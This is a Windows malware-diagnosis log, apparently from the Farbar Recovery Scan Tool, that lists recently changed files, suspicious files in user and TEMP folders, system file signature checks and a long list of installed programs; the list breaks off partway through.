2014-10-17 21:49 - 2006-11-02 08:42 - 00032554 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-10-17 21:46 - 2009-10-18 15:53 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-17 21:46 - 2009-10-18 15:53 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-17 14:26 - 2009-06-01 22:38 - 00000000 ____D () C:\Program Files (x86)\FLAC
2014-10-17 11:37 - 2008-12-23 14:57 - 00006080 _____ () C:\Users\Ashley\AppData\Local\d3d9caps.dat
2014-10-17 11:37 - 2008-12-22 17:50 - 00000000 ____D () C:\Users\RA Media Server
2014-10-17 11:10 - 2008-12-22 19:44 - 00000000 ____D () C:\Users\Ashley\AppData\Roaming\uTorrent
2014-10-17 10:48 - 2006-11-02 06:33 - 00000000 __RSD () C:\Windows\Media
2014-10-17 10:10 - 2008-12-25 17:52 - 00000000 ____D () C:\Windows\Minidump
2014-10-17 09:57 - 2013-07-18 18:11 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-17 09:10 - 2006-11-02 05:35 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2014-10-17 08:53 - 2008-12-22 12:21 - 00000000 ____D () C:\Users\Ashley
2014-10-14 11:41 - 2009-05-12 15:42 - 00000000 ____D () C:\ProgramData\Lx_cats
2014-10-14 09:49 - 2010-08-07 21:50 - 00006080 _____ () C:\Users\Guest\AppData\Local\d3d9caps.dat
2014-10-10 14:07 - 2012-04-26 14:19 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-10-10 13:29 - 2013-11-27 23:16 - 00000000 ____D () C:\ProgramData\Origin
2014-10-10 13:29 - 2008-12-26 16:54 - 00000000 ____D () C:\ProgramData\Electronic Arts
2014-10-10 13:11 - 2009-11-24 21:51 - 00000000 ____D () C:\Users\Ashley\AppData\Roaming\Notepad++
2014-10-10 12:47 - 2014-07-01 16:25 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-10-10 12:14 - 2006-11-02 06:33 - 00000000 ____D () C:\Windows\security
2014-10-10 11:23 - 2014-03-27 07:02 - 00000000 ____D () C:\Users\Ashley\Desktop\secprogs
2014-10-10 11:23 - 2014-03-27 07:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Paterva
2014-10-10 09:43 - 2009-04-06 21:09 - 00000000 ____D () C:\Users\Ashley\AppData\Roaming\Malwarebytes
2014-10-10 09:42 - 2011-07-13 15:01 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-10-10 09:42 - 2009-04-06 21:09 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-09 12:26 - 2010-07-04 19:51 - 00000000 ____D () C:\Users\Guest\AppData\Roaming\Mozilla
2014-10-01 09:51 - 2014-03-15 11:59 - 00000000 ____D () C:\Users\Guest\Desktop\Old Firefox Data
2014-09-26 10:09 - 2010-07-04 19:48 - 00000000 ____D () C:\Users\Guest
2014-09-23 15:56 - 2012-09-29 15:45 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-09-23 15:56 - 2012-09-29 15:45 - 00003684 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-09-23 15:56 - 2011-05-14 05:53 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
 
Files to move or delete:
====================
C:\Users\Ashley\1535_A06.EXE
C:\Users\Ashley\jagex_runescape_preferences.dat
C:\Users\Ashley\R182272_DellVideoChat_Setup_support.exe
C:\Users\Ashley\R186378.exe
C:\Users\Ashley\R197267.exe
 
 
Some content of TEMP:
====================
C:\Users\Administrator\AppData\Local\Temp\gtalkwmp1.dll
C:\Users\Ashley\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Games\AppData\Local\Temp\AutoRun.exe
C:\Users\Games\AppData\Local\Temp\AutoRunGUI.dll
C:\Users\Games\AppData\Local\Temp\uttAC59.tmp.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-18 12:27
 
==================== End Of Log ============================
 
 
 
Addition.txt
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 16-10-2014
Ran by Ashley at 2014-10-17 13:20:35
Running from C:\Users\Ashley\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
 Update for Microsoft Office 2007 (KB2508958) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version:  - Microsoft)
3DVIA player 5.0 (HKLM-x32\...\{4E868D3D-6EEB-4273-926C-2287236B5B79}) (Version: 5.0.0.10 - 3DVIA)
64 Bit HP CIO Components Installer (Version: 6.2.2 - Hewlett-Packard) Hidden
7500_7600_7700_Help1 (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Activation (Blu-ray Disc Authoring Plug-in) (HKLM-x32\...\{44f4c6bb-4266-4e30-9151-5e360032c4aa}) (Version:  - Nero AG)
Activation (Blu-ray Video Plug-in) (HKLM-x32\...\{4d0b7bbb-7831-4205-8763-5f229166fa0a}) (Version:  - Nero AG)
Activation (Gracenote Plug-in) (HKLM-x32\...\{0344678f-079c-47f0-acd0-c61057ba2817}) (Version:  - Nero AG)
Activation (Nero 9 HD) (HKLM-x32\...\{ca9bea0e-2c22-4fd7-9dc2-3c1155ee63a1}) (Version:  - Nero AG)
Activation (Nero BackItUp 4) (HKLM-x32\...\{3fb777c3-2933-46ff-9635-26ca90c8ace6}) (Version:  - Nero AG)
Activation (Nero MediaHome 4) (HKLM-x32\...\{8ac94ba8-cdd7-437e-902b-65134d31b88c}) (Version:  - Nero AG)
Activation (Nero Move it) (HKLM-x32\...\{b31643c8-9f44-4aba-814f-e9e3593f0685}) (Version:  - Nero AG)
ActivePerl 5.12.3 Build 1204 (HKLM-x32\...\{9C7D3BA9-F21F-4F64-AF53-427DE90883AF}) (Version: 5.12.1204 - ActiveState)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.5.1.17730 - Adobe Systems Inc.)
Adobe AIR (x32 Version: 2.5.1.17730 - Adobe Systems Inc.) Hidden
Adobe Anchor Service CS3 (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Adobe Asset Services CS3 (x32 Version: 3 - Adobe Systems Incorporated) Hidden
Adobe Bridge CS3 (x32 Version: 2 - Adobe Systems Incorporated) Hidden
Adobe Bridge Start Meeting (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Adobe Camera Raw 4.0 (x32 Version: 4.0 - Adobe Systems Incorporated) Hidden
Adobe CMaps (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Adobe Color - Photoshop Specific (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Adobe Color Common Settings (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Adobe Color EU Extra Settings (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Adobe Color JA Extra Settings (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Adobe Color NA Recommended Settings (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Adobe Community Help (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.4.980 - Adobe Systems Incorporated.)
Adobe Community Help (x32 Version: 3.4.980 - Adobe Systems Incorporated.) Hidden
Adobe Default Language CS3 (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Adobe Device Central CS3 (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Adobe Digital Editions (HKLM-x32\...\Digital Editions) (Version:  - )
Adobe Download Manager (HKLM-x32\...\{E2883E8F-472F-4fb0-9522-AC9BF37916A7}) (Version: 1.6.2.48 - NOS Microsystems Ltd.)
Adobe ExtendScript Toolkit 2 (x32 Version: 2.0 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.152 - Adobe Systems Incorporated)
Adobe Fonts All (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Adobe Help Viewer CS3 (x32 Version: 1 - Adobe Systems Incorporated) Hidden
Adobe Linguistics CS3 (x32 Version: 3.0.0 - Adobe Systems Incorporated) Hidden
Adobe Photoshop CS3 (HKLM-x32\...\Adobe_2ac78060bc5856b0c1cf873bb919b58) (Version: 10.0 - Adobe Systems Incorporated)
Adobe Photoshop CS5.1 (HKLM-x32\...\{9158FF30-78D7-40EF-B83E-451AC5334640}) (Version: 12.1 - Adobe Systems Incorporated)
Adobe Reader X (10.1.4) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.4 - Adobe Systems Incorporated)
Adobe Setup (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.2.122 - Adobe Systems, Inc.)
Adobe Stock Photos CS3 (x32 Version: 1.5 - Adobe Systems Incorporated) Hidden
Adobe Update Manager CS3 (x32 Version: 5.1.0 - Adobe Systems Incorporated) Hidden
Adobe Version Cue CS3 Client (x32 Version: 3 - Adobe Systems Incorporated) Hidden
Adobe XMP Panels CS3 (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Advanced Audio FX Engine (HKLM-x32\...\Advanced Audio FX Engine) (Version:  - )
Advertising Center (x32 Version: 0.0.0.1 - Nero AG) Hidden
AIM 7 (HKLM-x32\...\AIM_7) (Version:  - )
Akamai NetSession Interface (HKCU\...\Akamai) (Version:  - Akamai Technologies, Inc)
Apache HTTP Server 2.2.17 (HKLM-x32\...\{85262A06-2D8C-4BC1-B6ED-5A705D09CFFC}) (Version: 2.2.17 - Apache Software Foundation)
Apple Application Support (HKLM-x32\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{B678797F-DF38-4556-8A31-8B818E261868}) (Version: 8.0.0.23 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version:  - )
AutoUpdate (HKLM-x32\...\{18D10072035C4515918F7E37EAFAACFC}) (Version: 1.1 - )
Banctec Service Agreement (HKLM-x32\...\{42D68A86-DB1C-4256-B8C9-5D0D92919AF5}) (Version: 2.0.0 - Dell Inc.)
Blu-ray Disc Authoring Plug-in (HKLM-x32\...\{91899fbd-195a-4f7e-85da-5d943ec2d4c9}) (Version:  - Nero AG)
Blu-ray Video Plug-in (HKLM-x32\...\{774200cd-39a2-490a-9e5a-cc05ce176741}) (Version:  - Nero AG)
Blu-ray/HD DVD Video Plug-in (HKLM-x32\...\{51f6fbf1-ea07-4d31-8014-08f809ad240c}) (Version:  - Nero AG)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
bpd_scan_Carrier (x32 Version: 3.00.0000 - Hewlett-Packard) Hidden
BPDSoftware (x32 Version: 140.0.000.000 - Hewlett-Packard) Hidden
BPDSoftware_Ini (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
BufferChm (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 4.03 - Piriform)
Choice Guard (x32 Version: 1.2.87.0 - Microsoft Corporation) Hidden
Cisco EAP-FAST Module (HKLM-x32\...\{415B2719-AD3A-4944-B404-C472DB6085B3}) (Version: 2.1.6 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{83770D14-21B9-44B3-8689-F7B523F94560}) (Version: 1.0.12 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{669C7BD8-DAA2-49B6-966C-F1E2AAE6B17E}) (Version: 1.0.13 - Cisco Systems, Inc.)
ConvertXtoDVD 4.0.9.322 (HKLM-x32\...\{DB6AB705-C9BD-40E3-8929-2EA57F36A4FF}_is1) (Version: 4.0.9.322 - )
CrystalDiskInfo 5.6.2 (HKLM-x32\...\CrystalDiskInfo_is1) (Version: 5.6.2 - Crystal Dew World)
Dell Dock (HKLM\...\{F6CB42B9-F033-4152-8813-FF11DA8E6A78}) (Version: 1.0.0 - Dell)
Dell Remote Access (HKLM-x32\...\{F66A31D9-7831-4FBA-BA02-C411C0047CC5}) (Version: 1.0.0.0 - Dell Inc.)
Dell System Detect (HKCU\...\9204f5692a8faf3b) (Version: 5.4.0.4 - Dell)
Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.102.101.104 - Alps Electric)
Dell Video Chat (remove only) (HKLM-x32\...\Dell Video Chat) (Version: 6.0 (6551) - SightSpeed Inc.)
Dell Webcam Central (HKLM-x32\...\Dell Webcam Central) (Version:  - )
Dell Wireless WLAN Card Utility (HKLM\...\Broadcom 802.11 Application) (Version: 5.10.38.30 - Dell Inc.)
Deluge 1.3.9 (HKLM-x32\...\Deluge) (Version:  - )
Dev-C++ 5 beta 9 release (4.9.9.2) (HKLM-x32\...\Dev-C++) (Version:  - )
DivX Codec (HKLM-x32\...\{7B63B2922B174135AFC0E1377DD81EC2}) (Version: 6.8.5 - DivX, Inc.)
DivX Version Checker (HKLM-x32\...\{3FC7CBBC4C1E11DCA1A752EA55D89593}) (Version: 7.0.0.19 - DivX, Inc.)
DjVu Solo 3.1 (HKLM-x32\...\DjVu Solo 3.1) (Version:  - )
DolbyFiles (x32 Version: 2.0 - Nero AG) Hidden
Driver Booster (HKLM-x32\...\Driver Booster_is1) (Version: 1.4 - IObit)
DTS Plug-in (HKLM-x32\...\{608a42f6-0644-498b-aa62-b975f565e58f}) (Version:  - Nero AG)
DVD Flick 1.3.0.7 (HKLM-x32\...\DVD Flick_is1) (Version: 1.3.0.7 - Dennis Meuwissen)
EDocs (HKLM-x32\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version:  - )
Elizabeth Find MD - Diagnosis Mystery (HKLM-x32\...\Elizabeth Find MD - Diagnosis Mystery1.0) (Version: 1.0 - Adnan_Boy 2008)
Farmers Market (HKLM-x32\...\Farmers Market1.0) (Version: 1.0 - AllSmartGames)
FLAC 1.2.1b (remove only) (HKLM-x32\...\FLAC) (Version: 1.2.1b - Xiph.org)
Foxit PDF Editor (HKLM-x32\...\Foxit PDF Editor) (Version: 2.2.0.0205 - Foxit Software)
Foxit Reader (HKLM-x32\...\Foxit Reader) (Version: 4.3.1.323 - Foxit Corporation)
GameHouse Games Collection: Crystal Path (HKLM-x32\...\Crystal Path) (Version:  - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.101 - Google Inc.)
Google Drive (HKLM-x32\...\{C6640705-7479-4EE5-BC86-879F05F65E74}) (Version: 1.17.7290.4094 - Google, Inc.)
Google Talk (remove only) (HKLM-x32\...\{226b64e8-dc75-4eea-a6c8-abcb496320f2}-Google Talk) (Version:  - )
Google Talk Plugin (HKLM-x32\...\{F7770F7F-0ABC-30CB-95BC-93761A05CAB6}) (Version: 5.38.4.0 - Google)
Google Update Helper (x32 Version: 1.3.24.15 - Google Inc.) Hidden
Gracenote Plug-in (HKLM-x32\...\{de0e0bf0-ce73-481f-bedf-0f15a6433a6c}) (Version:  - Nero AG)
HijackThis 2.0.2 (HKLM-x32\...\HijackThis) (Version: 2.0.2 - TrendMicro)
HP OfficeJet L7300/L7500/7600/7700 (HKLM\...\{A818DAE1-EBBE-4438-B557-8115955D88E4}) (Version: 14.0 - HP)
HTC Driver Installer (HKLM-x32\...\{6D6664A9-3342-4948-9B7E-034EFE366F0F}) (Version: 2.0.7.018 - HTC Corporation)
HTC Sync (HKLM-x32\...\{ECAC39CD-5819-4D45-813E-C48A192F7219}) (Version: 2.0.35 - HTC Corporation)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6162.3 - IDT)
ImagXpress (x32 Version: 7.0.74.0 - Nero AG) Hidden
Integrated Webcam Driver (1.06.03.0309)   (HKLM\...\Creative OA001) (Version: 1.06.03.0309 - Creative Technology Ltd.)
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - Intel Corporation)
ITECIR (HKLM-x32\...\{F6BB6248-C507-46FE-8A35-1B16F35E0441}) (Version: 1.9 - ITE)
iTunes (HKLM\...\{F46AA0F1-E284-4878-A462-5F11B9166C0E}) (Version: 11.4.0.18 - Apple Inc.)
Java 7 Update 67 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217067FF}) (Version: 7.0.670 - Oracle)
Java Auto Updater (x32 Version: 2.1.67.1 - Oracle, Inc.) Hidden
Java™ SE Development Kit 6 Update 11 (HKLM-x32\...\{32A3A4F4-B792-11D6-A78A-00B0D0160110}) (Version: 1.6.0.110 - Sun Microsystems, Inc.)
Kits Configuration Installer (x32 Version: 8.37.0 - Microsoft) Hidden
L7000_Basic (x32 Version: 140.0.000.000 - Hewlett-Packard) Hidden
Lexmark 5600-6600 Series (HKLM\...\Lexmark 5600-6600 Series) (Version:  - Lexmark International, Inc.)
Lexmark Printable Web (HKLM-x32\...\{D2C5E510-BE6D-42CC-9F61-E4F939078474}) (Version: 1.0.0.0 - )
Life Quest 1.00 (HKLM-x32\...\Life Quest 1.00) (Version:  - )
Live! Cam Avatar Creator (HKLM-x32\...\{65D0C510-D7B6-4438-9FC8-E6B91115AB0D}) (Version: 4.6.1419.1 - Creative Technology Ltd)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
MediaDirect (HKLM-x32\...\{9C6978E8-B6D0-4AB7-A7A0-D81A74FBF745}) (Version: 4.0 - Dell)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Baseline Security Analyzer 2.2 (HKLM\...\{08C3441C-4FAF-48D3-A551-70DD6031734F}) (Version: 2.2.2170 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (x32 Version:  - Microsoft) Hidden
Microsoft Office Access MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Groove MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Groove Setup Metadata MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office InfoPath MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 64-bit Components 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2007 (x32 Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3) (x32 Version:  - Microsoft) Hidden
Microsoft Office Publisher MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft VC9 runtime libraries (x32 Version: 1.0.0 - AOL LLC) Hidden
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) - KB2467175 (HKLM\...\{aac9fcc4-dd9e-4add-901c-b5496a07ab2e}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148 (HKLM\...\{EE936C7A-EA40-31D5-9B65-8E3E089C3828}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM-x32\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft WSE 3.0 Runtime (HKLM-x32\...\{E3E71D07-CD27-46CB-8448-16D4FB29AA13}) (Version: 3.0.5305.0 - Microsoft Corp.)
Microsoft_VC80_ATL_x86 (x32 Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_ATL_x86_x64 (Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_CRT_x86 (x32 Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_CRT_x86_x64 (Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_MFC_x86 (x32 Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_MFC_x86_x64 (Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_MFCLOC_x86 (x32 Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_MFCLOC_x86_x64 (Version: 80.50727.4053 - Adobe) Hidden
Microsoft_VC90_ATL_x86 (x32 Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_ATL_x86_x64 (Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_CRT_x86 (x32 Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_CRT_x86_x64 (Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_MFC_x86 (x32 Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_MFC_x86_x64 (Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_MFCLOC_x86 (x32 Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_MFCLOC_x86_x64 (Version: 1.00.0000 - Adobe) Hidden
MinGW-Get version 0.4-alpha-1 (HKLM-x32\...\{AC2C1BDB-1E91-4F94-B99C-E716FE2E9C75}_is1) (Version: 0.4-alpha-1 - MinGW)
Mozilla Firefox 32.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 32.0.2 (x86 en-US)) (Version: 32.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
